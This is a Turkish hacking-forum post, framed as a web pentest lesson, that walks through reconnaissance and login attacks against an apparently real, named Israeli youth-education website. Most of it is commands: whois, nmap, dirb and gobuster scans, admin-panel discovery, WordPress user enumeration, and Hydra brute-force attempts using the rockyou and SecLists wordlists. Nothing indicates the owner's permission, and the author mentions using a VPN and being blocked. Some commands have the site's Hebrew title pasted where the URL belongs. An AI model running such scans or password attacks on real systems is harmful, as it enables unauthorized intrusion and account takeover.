Hepinize selamlar!
ben turkhackteam.org Anka Red TEAM'den,
@u1ku1912
Bugün sizlere total 21 dersten teorik ve pratik olmak üzere web pentest dersinin ikinci bölümünü anlatıyor olacağım,
hazırsanız başlayalım.
İlk adımımız, Bilgi Toplama (Reconnaissance):
Web sızma testinin ilk adımı bilgi toplamadır. Burada ki amaç; hedef hakkında maksimum veri elde etmek ve sonraki adımlar için zemin hazırlamaktır
.
Kali Linux üzerinden recconnaissance yapalım, alan adı ve sunucu bilgilerine erişelim.
Whois ile domain bilgisi sorgulayalım.
whois misgarot.org
Arkadaşlar buradan kayıt şirketini, şirketin whois sunucusunu, iletişimini adres ve telefon numarasını, son güncelleme tarihini bulduk ve alan adı transfer korumalı bu ileri ki işlemler için sıkıntı çıkaracak gibi duruyor. dns sunucularını da bulduk.
NSLookup ile IP adresini sorgulayalım
nslookup misgorot.org
nslookup ile dns kaydını bulamadık, nxdomain hatadır.
Whatweb ile sitede ki sunucu ve kullanılan teknoloji bilgilerini öğrenelim
whatweb מסגרות - האתר הגדול והנצפה בישראל לנוער שמעוניין ללמוד במסגרת שונה
whatweb ile sunucu adını, ip adresini ve yönlendirdiği adresi bulduk fakat yönlendirdiği adreste 302 hata alıyoruz yine yönlendiriyor ve bu sefer rusya ip adresi ile yapıyor bunu.
Nmap aracımız ile açık portlara ve servislere bakalım
nmap -Pn misgarot.org
dns kaydını bulamamıştık fakat ters dns kaydını bulduk ve 21 port açık yani dosya transferlerinin yapıldığı port porta sızdığımız taktirde dizinlerde gezinip, admin ve password bulabiliriz, istediğimiz dosyayı da çekebiliriz fakat unutulmamalıdır ki her 21 ftp portuna sızılmaz.
Curl ile HTTP ve Sunucu detayına bakalım
curl -I מסגרות - האתר הגדול והנצפה בישראל לנוער שמעוניין ללמוד במסגרת שונה
curl ile tanıdığımız da önceki konularımda 403, 302, 200... gibi sayıların önemine değindim. HTTP durumuna baktığımızda içerik var. sunucu ismi, içerik tipi yazı fakat sayfa önbelleğe alınmıyor. Link kısımlarına baktığımda Wordpress kullanıyor örneğin wp-json bunlarında bypass işlemleri yapılıyor. Set-Cookie kısmına baktığımızda oturum kimliği oluşturulmuş veya var. Yani wp-json yani php oturumu var.
Admin Paneli bulma kısmımıza gelelim,
Buradaki amacımız dizin değinmelerde olacak ilerleyen zamanlarda daha da detaylandıracağız. Burada bahsetmek istediğim admin paneli çoğu zaman dizinlerde bulunuyor olmasıdır.
Dizin taraması yapmak için toollarımızı kullanalım.
Dirb ile dizini proxy etkisi tarayalım. Normal tarama yapacaklar ilk parametreyi kullanabilirler
.
Dirb toolunun mantığı yaygın dizinleri otomatik olarak tarar ve karşımıza sunar
dirb מסגרות - האתר הגדול והנצפה בישראל לנוער שמעוניין ללמוד במסגרת שונה
dirb מסגרות - האתר הגדול והנצפה בישראל לנוער שמעוניין ללמוד במסגרת שונה -p 127.0.0.1:8080
Arkadaşlar buradan 403'lere baktığımda sistem dosyalara erişimi kapatmış. 302'ye baktığımda dizinlere erişilmiyor ya gizlendi ya da adını değiştirdiler. 200'lere baktığımda andpoint içerikler var. Sunucu bilgilerini üst kısımlarda söyledim söylediklerime ek oturum kimliğini PHPSESSID ile oluşturmuşlar. Yani wordpress'i güncel tutmazlarsa bu bizim işimize gelecektir.
Gobuster ile Wordlist taraması yapalım
Buradaki amaç parametrelerde belirttiğimiz dizinleri tarayacaktır
gobuster dir -u מסגרות - האתר הגדול והנצפה בישראל לנוער שמעוניין ללמוד במסגרת שונה -w /usr/share/wordlists/dirb/common.txt -b 302
Arkadaşlar buradan phpmyadmin, phpMyAdmin, pma, squirrelmail, webmail, wp-admin dizinlerini tespit ettik. Bunlar 301 kodu ile başka adrese yönlendirilmiş
Arkadaşlar bu aşamaya kadar admin panelini bulmamız lazımdı, eğer bulunamazsa Wordpress siteleri için genelde bu şekilde olur.
/admin/
/admin/login.php
/administrator/
/login/
/adminpanel/
tek tek bunları tarayıcıda domainin sonuna getirerek deneyelim daha sonra ise şu parametreleri de deneyebiliriz.
curl -I https://www.misgarot.org/admin/login.php
curl -I https://www.misgarot.org/wp-admin/
Arkadaşlar neyse ki uzun uzun denememize gerek kalmadığı dediğim gibi
curl -I https://www.misgarot.org/admin/
yazdığım gibi beni admin paneli karşıladı.
Arkadaşlar bugünlük konumuz bu kadardı buraya kadar anlaşıldıysa güzel bir şekilde ilerliyoruz.
Fakat buraya kadar gelmişken bundan sonra yapılacak işlemleri merak eden arkadaşlar için devam ediyorum.
Admin users bulmak için:
https://www.misgarot.org/wp-json/wp/v2/users adresine gidiyorum
Fakat buradan birşey çıkmadı
Wpscan ile brute force yapacağım
wpscan --url מסגרות - האתר הגדול והנצפה בישראל לנוער שמעוניין ללמוד במסגרת שונה -eu --random-user-agent
wpscan --url מסגרות - האתר הגדול והנצפה בישראל לנוער שמעוניין ללמוד במסגרת שונה --random-user-agent
Hata alıyoruz hatayı anlamak için
wpscan --url מסגרות - האתר הגדול והנצפה בישראל לנוער שמעוניין ללמוד במסגרת שונה --debung-output site.txt diyoruz.
Buradan birşey çıkmadı.
ilk önce wordlist lazımdır,
admin ve password kısmı için hazır bir şekilde indirebiliriz. Örnek olarak:
git clone GitHub - danielmiessler/SecLists: SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
Read'ı okuduktan sonra uygun bir şekilde domain içerecek şekilde parametremizi yazalım
hydra -L /home/kali/Desktop/SecLists/Usernames/top-usernames-shortlist.txt -P /home/kali/Desktop/SecLists/Passwords/Common-Credentials/10k-most-common.txt misgarot.org http-post-form "/admin/login.aspx:username=^USER^&password=^PASS^:Invalid login"
Bekliyorum ve hata aldığımın farkına vardım işlemimi sonlandırıyorum.
rockyou.txt dosyasını sisteme kurup hydra aracımda gereki parametreyi yazarak çalıştırmayı deneyeceğim.
Sıkıştırılmış rockyou dosyasını açmak içinn
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
daha sonra dosyamı kontrol ediyorum varolup olmadığını
ls /usr/share/wordlists/rockyou.txt
Ve hydra aracımla rockyou.txt dosyasını kullanarak gerekli parametre ile toolu çalıştırıyorum
hydra -l admin -P /usr/share/wordlists/rockyou.txt https-get://www.misgarot.org/wp-login.php
Tek tek deneme yaptığımda bu işlemde dahil önceki işlemlerimden dolayı, wrap açıp kapatmama rağmen engelledi,
mecburiyeten işlemimi burada sonlandırıyorum.
Bir sonraki konumuz olan dizin sorgulamada görüşmek üzere
Esen kalın dostlar....
Son düzenleme:
Takipteyim eline koluna sağlık kardeşim
serinin devamını dört gözle bekliyorum...
